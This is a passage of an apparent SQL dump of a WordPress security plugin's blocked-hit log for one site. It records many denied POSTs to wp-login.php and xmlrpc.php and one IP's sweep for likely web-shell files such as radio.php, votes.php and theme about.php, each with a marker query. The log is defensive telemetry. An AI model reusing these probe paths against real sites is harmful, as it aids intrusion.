10_9_4 AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/36.0.1985.125 Safari\\/537.36\"}','qnhB4fz2SbI8GCLNUdwKEPe3',0,1665000792.2211,1359,'','POST',403,0,600,0,1,'',0),('167.172.168.111',2813110383,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/48.0.2564.116 Safari\\/537.36\"}','fI7zMltbqjn8H0awvRYUchXA',0,1665030121.9573,17580,'','POST',403,0,600,0,1,'',0),('103.74.120.192',1732933824,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','SFlpU0NfbcZv3Paqn6L52gTR',0,1665029655.1783,18689,'','POST',403,0,515,0,1,'',0),('161.35.193.62',2703475006,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','Ra9HgVP6lZUABeKpW5xOvFTj',0,1665029235.0143,18764,'','POST',403,0,515,0,1,'',0),('180.149.241.246',3029725686,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','AjUlmK4sIZhbw5P3Lzfa0xkX',0,1665065263.2254,18867,'','POST',403,0,515,0,1,'',0),('198.98.60.32',3328326688,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident\\/5.0)\"}','iCAbQSung6D9IzyalTqZf7oP',0,1665082944.2622,501,'','POST',403,0,600,0,1,'',0),('121.243.95.160',2045992864,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.101 Safari\\/537.36\"}','RjF80txWHGmc2gSDyTrB53PU',0,1665083469.1925,18008,'','POST',403,0,600,0,1,'',0),('193.37.254.27',3240492571,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','d3j0b5YxTqoXkAvWOyBIKV1u',0,1665088777.1359,2324,'','POST',403,0,515,0,1,'',0),('137.184.117.52',2310567220,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.130 Safari\\/537.36\"}','nbahc70gKxTwFsieOISDuHpM',0,1665088305.6030,1125,'','POST',403,0,600,0,1,'',0),('103.149.154.8',1737857544,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/47.0.2526.106 Safari\\/537.36\"}','UgHbBvLndzfKumWyiEN2O6M0',0,1665088263.2816,11221,'','POST',403,0,600,0,1,'',0),('93.114.185.76',1567799628,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/47.0.2526.111 Safari\\/537.36 MVisionPlayer\\/1.0.0.0\"}','6OYLXHxnidP7p8utbKGClgJf',0,1665112867.1223,17901,'','POST',403,0,600,0,1,'',0),('171.244.0.91',2884894811,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/56.0.2924.87 Safari\\/537.36\"}','oCZbAGWk8zL7N4Hlnq0ySYMT',0,1665115389.6229,9829,'','POST',403,0,600,0,1,'',0),('64.227.162.186',1088660154,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','sxOpgzoim7dnrUGjMvw8k4tu',0,1665122670.2185,16577,'','POST',403,0,515,0,1,'',0),('167.172.166.178',2813109938,'','https://cteisys.com/wp-admin/js/widgets/radio.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','SmWKxeVYz1LMs58qwJgdpnui',0,1665140881.4658,436,'','POST',403,0,700,0,1,'',0),('167.172.166.178',2813109938,'','https://cteisys.com/wp-admin/js/widgets/radio.php?673435=1','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','aHlQAhqtxI0s6MiCTfuLjwry',0,1665140880.3628,320,'','GET',403,0,700,0,1,'',0),('194.42.98.32',3257557536,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','z83Q0S9xH6gvjhOGD7dYbsLR',0,1665129730.3753,20024,'','POST',403,0,515,0,1,'',0),('195.225.76.130',3286322306,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','aEslTMjd8WopVAnPgcq9ruKU',0,1665129342.1083,18597,'','POST',403,0,515,0,1,'',0),('95.167.178.158',1604825758,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','vb4fjcJqw1BOyVT09thgPIRF',0,1665128968.3563,18384,'','POST',403,0,515,0,1,'',0),('8.210.102.36',148006436,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','uI1mXGC3fxeVhz5ybtRJPNrO',0,1665128557.0668,18638,'','POST',403,0,515,0,1,'',0),('125.227.29.249',2112036345,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','UH9VoNQFjCTZW3iShxA0RuqX',0,1665128183.5812,19445,'','POST',403,0,515,0,1,'',0),('68.235.48.108',1156264044,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','iVbtZcjyqOfgnamNrAeh1EKI',0,1665127652.4363,18771,'','POST',403,0,515,0,1,'',0),('109.233.192.83',1844035667,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','JQ48ipInKHL6FfxZMkBUz9vG',0,1665127476.6593,18377,'','POST',403,0,515,0,1,'',0),('111.90.150.171',1868207787,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','Sgk0uTvo2qy3XcwfeIxD6CFl',0,1665127078.5125,18493,'','POST',403,0,515,0,1,'',0),('72.29.76.78',1209879630,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','yY7IOMSWAtQ5Dqdr3Nv1b0LT',0,1665126709.7059,18343,'','POST',403,0,515,0,1,'',0),('167.172.166.178',2813109938,'','https://cteisys.com/radio.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','8Km9OdHx4g3PXF2fTQUDA1kS',0,1665140879.3093,305,'','POST',403,0,700,0,1,'',0),('167.172.166.178',2813109938,'','https://cteisys.com/radio.php?673435=1','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','hLOd6FsDYvKRHia59mVZg8qp',0,1665140878.3158,306,'','GET',403,0,700,0,1,'',0),('167.172.166.178',2813109938,'','https://cteisys.com/about.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','n5qOSZBa3FNDbEM76GrsUoYx',0,1665140877.3247,304,'','POST',403,0,700,0,1,'',0),('167.172.166.178',2813109938,'','https://cteisys.com/about.php?673435=1','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','6nOJq9jNxbclmF8Q7PAHtMB4',0,1665140876.1849,368,'','GET',403,0,700,0,1,'',0),('167.172.166.178',2813109938,'','https://cteisys.com/css/votes.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','D1jdtcf4q2RprPZAKxuThM7I',0,1665140875.1038,347,'','POST',403,0,700,0,1,'',0),('150.230.247.143',2531719055,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','qILrbhBJupc2WPmk4S5egs9y',0,1665133026.5544,10398,'','POST',403,0,515,0,1,'',0),('72.34.62.119',1210203767,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','xUrdyNODmEeavbG9Piz5BKfs',0,1665132159.4832,1634,'','POST',403,0,515,0,1,'',0),('45.130.83.34',763515682,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','gRPbWYJlfFxdoDCtkIp6Xi2q',0,1665132580.5886,1454,'','POST',403,0,515,0,1,'',0),('8.218.143.243',148541427,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','KiqugLCzwNf9TklRGocW5rJj',0,1665131746.8123,18616,'','POST',403,0,515,0,1,'',0),('111.90.145.188',1868206524,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','0niq8uvxgLyE9ZM6dbY5XoOj',0,1665130944.3372,1638,'','POST',403,0,515,0,1,'',0),('199.249.230.7',3355043335,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','ouzQcxsn1j4kT0RwOp8ZF7UX',0,1665130754.5993,18280,'','POST',403,0,515,0,1,'',0),('90.156.169.12',1520216332,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','xS5ypfcaoCA3q0Fv78BJH4TP',0,1665130552.3679,1505,'','POST',403,0,515,0,1,'',0),('162.144.49.214',2727358934,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','h2gAacn1QHKOfm09GBNEFUwL',0,1665130139.4713,18778,'','POST',403,0,515,0,1,'',0),('20.5.104.175',335898799,'','https://cteisys.com//xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/95.0.4638.69 Safari\\/537.36\"}','6q3MahfbeNXOpFrUizQjPv0o',0,1665129920.0826,630,'','POST',403,0,515,0,1,'',0),('146.70.115.139',2454090635,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','AuzQvYiX8Z25Fw9CpcjGxLsH',0,1665129761.5594,488,'','POST',403,0,515,0,1,'',0),('167.172.166.178',2813109938,'','https://cteisys.com/css/votes.php?673435=1','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','Kd1makHyDgTM8zreqU3fBIJw',0,1665140873.1078,1237,'','GET',403,0,700,0,1,'',0),('167.172.166.178',2813109938,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','Sl5abKmWOcX7DrzTZ2GHgqUd',0,1665140870.8956,1477,'','POST',403,0,515,0,1,'',0),('167.172.166.178',2813109938,'','https://cteisys.com/xmlrpc.php?673435=1','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','2rLpndwkT9NYmcGOKIohiR8D',0,1665140869.5319,367,'','GET',403,0,515,0,1,'',0),('167.172.166.178',2813109938,'','https://cteisys.com/wikindex.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','oyBWVzrht9nkDf8iG4cgj7JZ',0,1665140867.2184,1464,'','POST',403,0,700,0,1,'',0),('167.172.166.178',2813109938,'','https://cteisys.com/wikindex.php?673435=1','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','vUWIjEmys6rtgCFDpfSxw2lc',0,1665140866.0965,332,'','GET',403,0,700,0,1,'',0),('167.172.166.178',2813109938,'','https://cteisys.com/admin.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','2TIVOnurQfhXcU9pjSZAsmYa',0,1665140864.9136,370,'','POST',403,0,700,0,1,'',0),('167.172.166.178',2813109938,'','https://cteisys.com/admin.php?673435=1','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','EJeHLqG5lYanfUCxzDpydkbZ',0,1665140863.9403,300,'','GET',403,0,700,0,1,'',0),('167.172.166.178',2813109938,'','https://cteisys.com/load.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','X7d5gx2ieJqtUzNRyDI8Zfvp',0,1665140862.7442,296,'','POST',403,0,700,0,1,'',0),('167.172.166.178',2813109938,'','https://cteisys.com/load.php?673435=1','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','gFWthDNiInPlYAB6L5exQJs1',0,1665140861.7151,314,'','GET',403,0,700,0,1,'',0),('167.172.166.178',2813109938,'','https://cteisys.com/','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','vBuE6iWd95D2gpOZeMjtInw3',0,1665140860.6399,310,'','POST',403,0,700,0,1,'',0),('167.172.166.178',2813109938,'','https://cteisys.com/?673435=1','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','p5QmYaO1hxVJuiKvdkbXE276',0,1665140859.3005,301,'','GET',403,0,700,0,1,'',0),('167.172.166.178',2813109938,'','https://cteisys.com/1index.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','ze48Wxlw5721kOvF6HptDbPM',0,1665140857.9185,363,'','POST',403,0,700,0,1,'',0),('51.210.99.98',869426018,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','BFOefT8xAbph95gGYKHmDJSC',0,1665136566.5719,7027,'','POST',403,0,515,0,1,'',0),('185.46.121.66',3106830658,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','HowLRhdOql5AnVtf9zPWYD7J',0,1665136107.2783,17299,'','POST',403,0,515,0,1,'',0),('192.99.34.140',3227722380,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','BHArJcUnuzaOEgoYx4lRSDpm',0,1665135668.7857,2290,'','POST',403,0,515,0,1,'',0),('209.141.57.9',3515693321,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident\\/5.0)\"}','GH1XSzNU5maCvg9nM7QEcLFo',0,1665135368.0106,1757,'','POST',403,0,600,0,1,'',0),('151.106.35.235',2540315627,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','osZKM5X69AraETD1GYvOxFmJ',0,1665134774.3680,1367,'','POST',403,0,515,0,1,'',0),('213.152.161.170',3583549866,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','nY7GVCMJe4m5OTxHNLIFDa83',0,1665134661.2974,1427,'','POST',403,0,515,0,1,'',0),('194.233.67.171',3270067115,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','A7hwg3IUo1EBxO8z6TcbvJDC',0,1665134318.7763,19040,'','POST',403,0,515,0,1,'',0),('167.172.166.178',2813109938,'','https://cteisys.com/1index.php?673435=1','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','svWRK3aloOzifkgb0INjPDyr',0,1665140856.7618,346,'','GET',403,0,700,0,1,'',0),('167.172.166.178',2813109938,'','https://cteisys.com/2index.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','e0c5F8TjKpHMR9JhOqtwrU2S',0,1665140855.7530,300,'','POST',403,0,700,0,1,'',0),('167.172.166.178',2813109938,'','https://cteisys.com/2index.php?673435=1','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','LyOnUdue5Y8oZSrqI97NfKPk',0,1665140854.6736,328,'','GET',403,0,700,0,1,'',0),('167.172.166.178',2813109938,'','https://cteisys.com/votes.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','uHWVrRIaPtSFgeEGY5qsljcn',0,1665140853.0768,276,'','POST',403,0,700,0,1,'',0),('167.172.166.178',2813109938,'','https://cteisys.com/votes.php?673435=1','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','fbc2zjMp7SlxNdUFwZqETo8J',0,1665140851.9207,324,'','GET',403,0,700,0,1,'',0),('157.0.140.186',2634058938,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','PuxIW8vf3HCeVb0nd9XzwE6D',0,1665140012.2694,478,'','POST',403,0,600,0,1,'',0),('213.149.103.132',3583338372,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','VkB9HJK3O42bSizdlmXDRNoe',0,1665138857.0553,4303,'','POST',403,0,515,0,1,'',0),('38.242.221.235',653450731,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','fIacgBEjU1xqTz4P9XFNJWsH',0,1665138381.6743,19342,'','POST',403,0,515,0,1,'',0),('159.65.129.186',2671870394,'','https://cteisys.com//xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/95.0.4638.69 Safari\\/537.36\"}','NlhVgQfYvEAqyKO7FU3GzCHM',0,1665138792.3662,1516,'','POST',403,0,515,0,1,'',0),('194.242.56.232',3270654184,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','b574HpATgW2iqkEyX9Ptu3wz',0,1665137937.7976,18476,'','POST',403,0,515,0,1,'',0),('139.59.6.209',2335901393,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','vTcxOJ9QyFWkHzCXerG2a3NA',0,1665137000.0803,9457,'','POST',403,0,515,0,1,'',0),('167.172.166.178',2813109938,'','https://cteisys.com/css/load.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','bJ7XHr9ZOtDywSGskBdP8R2I',0,1665140850.8150,272,'','POST',403,0,700,0,1,'',0),('167.172.166.178',2813109938,'','https://cteisys.com/css/load.php?673435=1','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','OPKcbyCfdEMsa4N25unUxQ0H',0,1665140849.6211,310,'','GET',403,0,700,0,1,'',0),('167.172.166.178',2813109938,'','https://cteisys.com/contents.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','8OjngfFoQCzasqrBDi9EmLN3',0,1665140848.2545,381,'','POST',403,0,700,0,1,'',0),('167.172.166.178',2813109938,'','https://cteisys.com/contents.php?673435=1','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','aJBC4rctWTHpqdK6fbh7QOAs',0,1665140847.1676,323,'','GET',403,0,700,0,1,'',0),('167.172.166.178',2813109938,'','https://cteisys.com/css/contents.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','C73zvATsIJYgNaPqUBdjFZ4X',0,1665140846.1255,286,'','POST',403,0,700,0,1,'',0),('167.172.166.178',2813109938,'','https://cteisys.com/css/contents.php?673435=1','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','VjfLCBx8N3iF9ztkqYQ0Rwm2',0,1665140845.0991,300,'','GET',403,0,700,0,1,'',0),('167.172.166.178',2813109938,'','https://cteisys.com/css/index.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','CT8RoFm4rxJ2iWKnbtvGDHBk',0,1665140841.5529,323,'','POST',403,0,700,0,1,'',0),('167.172.166.178',2813109938,'','https://cteisys.com/css/index.php?673435=1','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','MucenTJZSsNxa23wELDqjBgo',0,1665140840.2631,303,'','GET',403,0,700,0,1,'',0),('167.172.166.178',2813109938,'','https://cteisys.com/years.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','M30hoXDakpenzc7JR4STAdNI',0,1665140839.2463,282,'','POST',403,0,700,0,1,'',0),('167.172.166.178',2813109938,'','https://cteisys.com/years.php?673435=1','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','O0vdafnFU71NgWmYHEwepB6P',0,1665140837.8828,308,'','GET',403,0,700,0,1,'',0),('167.172.166.178',2813109938,'','https://cteisys.com/wp-content/themes/seotheme/about.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','c0ern1ysXhQAZt62uDHLOim8',0,1665140836.5959,299,'','POST',403,0,700,0,1,'',0),('167.172.166.178',2813109938,'','https://cteisys.com/wp-content/themes/seotheme/about.php?673435=1','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','7LprslyoJvhtIPVFCd1Y2mQk',0,1665140835.5865,278,'','GET',403,0,700,0,1,'',0),('167.172.166.178',2813109938,'','https://cteisys.com/wp-content/themes/pridmag/about.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','XeuP8U5JdkTb6Dp2RAHf7lZm',0,1665140831.7453,296,'','POST',403,0,700,0,1,'',0),('167.172.166.178',2813109938,'','https://cteisys.com/wp-content/themes/pridmag/about.php?673435=1','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','5cMowdJBq9gEV4a3CDrbYNjR',0,1665140830.6648,323,'','GET',403,0,700,0,1,'',0),('171.244.17.110',2884899182,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','TZlMObqypugjF1xSGkXf5vd7',0,1665147655.9133,18809,'','POST',403,0,515,0,1,'',0),('134.19.179.187',2249438139,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','bj7Ze130EOwu5pTWLQdXcRGD',0,1665147670.0513,4671,'','POST',403,0,515,0,1,'',0),('109.233.192.83',1844035667,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','e23doObXfWx50vQLHTZ6jY8D',0,1665146545.2562,470,'','POST',403,0,600,0,1,'',0),('217.64.127.195',3644882883,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 